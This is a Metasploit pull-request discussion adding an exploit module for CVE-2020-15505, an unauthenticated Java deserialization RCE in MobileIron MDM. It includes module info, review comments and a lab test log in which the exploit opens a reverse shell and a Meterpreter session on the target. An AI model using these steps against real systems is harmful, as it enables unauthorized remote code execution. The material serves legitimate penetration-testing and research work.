Add MobileIron CVE-2020-15505 exploit

[wvu]

msf6 exploit(linux/http/mobileiron_mdm_hessian_rce) > info

       Name: MobileIron MDM Hessian-Based Java Deserialization RCE
     Module: exploit/linux/http/mobileiron_mdm_hessian_rce
   Platform: Unix, Linux
       Arch: cmd, x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2020-09-12

Provided by:
  Orange Tsai
  rootxharsh
  iamnoooob
  wvu <wvu@metasploit.com>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Unix Command
  1   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      443              yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an ACL bypass in MobileIron MDM products to
  execute a Groovy gadget against a Hessian-based Java deserialization
  endpoint.

References:
  https://cvedetails.com/cve/CVE-2020-15505/
  https://www.mobileiron.com/en/blog/mobileiron-security-updates-available
  https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
  https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2020-15505

msf6 exploit(linux/http/mobileiron_mdm_hessian_rce) >

[label-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[smcintyre-r7]

Everything looks good. My only concern is that there appear to be a few strings that would likely benefit from some randomization like the Referer header, MSF on L130 and HACK THE PLANET on L144.

Other than that looks good, I'll test this once I get an environment up.

[smcintyre-r7]

Finished testing and it worked as intended after I got the environment up.

msf6 exploit(linux/http/mobileiron_mdm_hessian_rce) > show options 

Module options (exploit/linux/http/mobileiron_mdm_hessian_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.50   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443              yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_python_ssl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


msf6 exploit(linux/http/mobileiron_mdm_hessian_rce) > check
[+] 192.168.159.50:443 - The target is vulnerable. ACL bypass successful.
msf6 exploit(linux/http/mobileiron_mdm_hessian_rce) > exploit

[*] Started reverse SSL handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. ACL bypass successful.
[*] Executing Unix Command for cmd/unix/reverse_python_ssl
[*] Command shell session 2 opened (192.168.159.128:4444 -> 192.168.159.50:41826) at 2021-01-22 16:28:18 -0500

id
uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)
exit	
[*] 192.168.159.50 - Command shell session 2 closed.
msf6 exploit(linux/http/mobileiron_mdm_hessian_rce) > set TARGET 1
TARGET => 1
msf6 exploit(linux/http/mobileiron_mdm_hessian_rce) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. ACL bypass successful.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Sending stage (3008420 bytes) to 192.168.159.50
[*] Command Stager progress - 100.00% done (823/823 bytes)
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.50:41836) at 2021-01-22 16:28:30 -0500

meterpreter > getuid
Server username: tomcat @ mobileiron.home.lan (uid=101, gid=102, euid=101, egid=102)
meterpreter > sysinfo
Computer     : mobileiron.home.lan
OS           : CentOS 7.6.1810 (Linux 3.10.0-1062.4.1.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

[smcintyre-r7]

Release Notes

New exploit module exploits/linux/http/mobileiron_mdm_hessian_rce targets CVE-2020-15505, an unauthenticated RCE in MobileIron. The vulnerability is due to the deserialization of user data in an API endpoint that can be accessed through an ACL bypass.

[kishore040]

Its amazing